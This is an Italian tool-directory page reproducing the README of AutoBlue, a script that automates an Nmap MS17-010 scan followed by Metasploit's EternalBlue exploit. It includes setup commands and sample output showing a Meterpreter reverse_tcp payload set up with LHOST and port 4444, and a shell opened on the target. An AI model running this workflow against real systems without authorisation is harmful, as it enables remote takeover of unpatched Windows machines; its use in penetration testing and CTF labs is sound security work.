Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
autoblue — AutoBlue - Strumento di sfruttamento automatizzato per EternalBlue (CVE-2017-0144 / MS17-010) che utilizza Nmap e Metasploit per ethical hacking, penetration testing e sfide CTF. Solo per uso autorizzato ed educativo! | Kitploit
Strumenti/GitHubGitHub/atithkhawas/autoblue
Scanner di VulnerabilitàGenerazione di PayloadExploitPost-ExploitCTFPenetration TestingApprendimento e FormazioneRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue - Strumento di sfruttamento automatizzato per EternalBlue (CVE-2017-0144 / MS17-010) che utilizza Nmap e Metasploit per ethical hacking, penetration testing e sfide CTF. Solo per uso autorizzato ed educativo!

41101 anno faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

AUTOBLUE: Strumento Automatico per l'Exploit EternalBlue

AUTOBLUE è uno strumento di automazione progettato per sfruttare la vulnerabilità EternalBlue (CVE-2017-0144) su macchine Windows. Lo strumento integra la potenza di Nmap per la scansione delle vulnerabilità e di Metasploit's msfconsole per lo sfruttamento, consentendo agli utenti di identificare automaticamente i sistemi vulnerabili e lanciare l'exploit EternalBlue per ottenere accesso remoto al target.

Questo strumento è progettato principalmente per professionisti della sicurezza, penetration tester e hacker etici che operano in ambienti controllati e autorizzati, come sfide Capture The Flag (CTF), attività di penetration testing o configurazioni di laboratorio. AUTOBLUE consente agli utenti di sfruttare la vulnerabilità EternalBlue con un intervento manuale minimo, semplicemente inserendo l'indirizzo IP del target.

Caratteristiche

  • Scansione Automatica delle Vulnerabilità: Utilizza Nmap per scansionare la vulnerabilità EternalBlue (CVE-2017-0144) sulla macchina target.

  • Sfruttamento Senza Intoppi: Sfrutta Metasploit's msfconsole per lanciare automaticamente l'exploit EternalBlue.

  • Configurazione Semplice: Richiede solo un indirizzo IP target e un ambiente funzionante con Nmap e Metasploit installati.

  • Report di Output: Genera output che indica il successo o il fallimento del tentativo di exploit.

Indice dei Contenuti

  • Prerequisiti

  • Installazione

  • Utilizzo

  • Come Funziona

  • Considerazioni sulla Sicurezza

  • Contributi

  • Licenza

  • Riconoscimenti

  • Dichiarazione di non responsabilità

Prerequisiti:

Prima di utilizzare AUTOBLUE, assicurati che i seguenti strumenti siano installati sulla tua macchina:

Nmap: Uno strumento di scansione di rete per rilevare macchine vulnerabili.

Metasploit Framework: Una piattaforma di penetration testing che include exploit per EternalBlue.

Installare Nmap:

  • Su Linux (basato su Debian):

Copia il codice

      sudo apt update

e

      sudo apt install nmap

Su Windows o macOS, scarica Nmap dal sito ufficiale.

Installare Metasploit:

Su Linux (basato su Debian):

Copia il codice

      sudo apt update

e

     sudo apt install metasploit-framework
     

Su Windows o macOS, scarica Metasploit dal sito ufficiale.

Installazione:

Per installare AUTOBLUE, segui questi passaggi:

  • Clona il repository:

      git clone https://github.com/AtithKhawas/autoblue.git
    

    e

         cd autoblue
    

Assicurati che Nmap e Metasploit siano correttamente installati come prerequisiti.

  • Rendi lo script eseguibile:

    chmod +x autoblue.sh
    

Utilizzo:

AUTOBLUE è progettato per automatizzare la scansione e lo sfruttamento della vulnerabilità EternalBlue. Ecco come usarlo:

  • Esegui lo Strumento

Per utilizzare AUTOBLUE, esegui il seguente comando nel tuo terminale:

Copia il codice

     ./autoblue.sh 

Output:

     ┌──(root㉿kali)-[/home/Elliot] 
     └─# ./autoblue.sh 
     ============================================
     ********************************************
     AutoBlue    - EternalBlue Exploit Automation
     ********************************************
     ********************************************
     ------------------------Made by ATITH KHAWAS
     ============================================
     Enter Target IP Address:

Ti chiederà l'indirizzo IP del target e il tuo.

Esempio

      Enter Target IP Address: Target<IP Address>
      Enter Your IP Address: Your <IP Address>

Una volta eseguito lo strumento, inizierà la scansione con Nmap:

Output-1

 Target IP Address: ***.***.**.**
 [+] Scanning Target for MS17-010 Vulnerability...
 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
 Nmap scan report for ***.***.**.**
 Host is up (0.19s latency).

 PORT    STATE SERVICE
 445/tcp open  microsoft-ds

 Host script results:
 | smb-vuln-ms17-010: 
 |   VULNERABLE:
 |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
 |     State: VULNERABLE
 |     IDs:  CVE:CVE-2017-0143
 |     Risk factor: HIGH
 |       A critical remote code execution vulnerability exists in Microsoft SMBv1
 |        servers (ms17-010).
 |           
 |     Disclosure date: 2017-03-14
 |     References:
 |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
 |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

 Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
 [+] Target is VULNERABLE to EternalBlue!

Qui inizia il vero lavoro, riducendo significativamente il processo che richiede tempo. Se il target è vulnerabile, avvia automaticamente Msfconsole e imposta RHOSTS, PAYLOAD, LHOST e LPORT con la porta predefinita 4444.

Output-2

      [+] Launching Metasploit...
      [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
      RHOSTS => ***.***.**.**
      PAYLOAD => windows/x64/meterpreter/reverse_tcp
      LHOST => ***.***.**.**
      LPORT => 4444
      [*] Started reverse TCP handler on ***.***.**.**:4444 

E ci fornisce la shell Meterpreter del target.

Output-3

       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

       meterpreter > pwd
       C:\Windows\system32

Come Funziona:

  • Scansione con Script Nmap: Lo strumento utilizza prima Nmap Script Scan (--script smb-vuln-ms17-010) per rilevare se la macchina target è vulnerabile all'exploit EternalBlue. Controlla se la porta 445 è aperta e tenta di identificare vulnerabilità SMB.

  • Exploit Metasploit: Se la macchina target risulta vulnerabile, AUTOBLUE procede a lanciare l'exploit EternalBlue utilizzando Metasploit's msfconsole. Lo script configurerà e invierà il payload necessario per sfruttare la vulnerabilità.

  • Reverse Shell: Se l'exploit ha successo, verrà aperta una reverse shell per fornire un'interfaccia a riga di comando sulla macchina vittima.

  • Feedback: Lo strumento fornisce feedback durante tutto il processo, incluso se il target è stato sfruttato con successo, e restituisce eventuali informazioni rilevanti (ad esempio, l'indirizzo IP della reverse shell).

Considerazioni sulla Sicurezza:

  • Uso Legale: Questo strumento dovrebbe essere utilizzato solo in ambienti autorizzati. Assicurati di avere il permesso esplicito di testare la macchina target e che non sia illegale farlo nella tua giurisdizione.

  • Input dell'Utente: Assicurati che solo IP fidati vengano inseriti nello strumento per prevenire abusi. Eseguire questo strumento su sistemi non fidati potrebbe portare a incidenti di sicurezza.

  • Sicurezza del Payload: Il payload della reverse shell utilizzato in questo strumento è intrinsecamente rischioso. Non esporre la macchina attaccante o i suoi listener a reti non fidate.

  • Mantenere Aggiornate le Dipendenze: Assicurati di aggiornare regolarmente Nmap e Metasploit per mitigare vulnerabilità di sicurezza note in questi strumenti.

Contributi:

I contributi al progetto AUTOBLUE sono benvenuti. Se hai suggerimenti, miglioramenti o correzioni di bug, sentiti libero di fare il fork del repository e creare una pull request.

Licenza:

Scarica lo strumento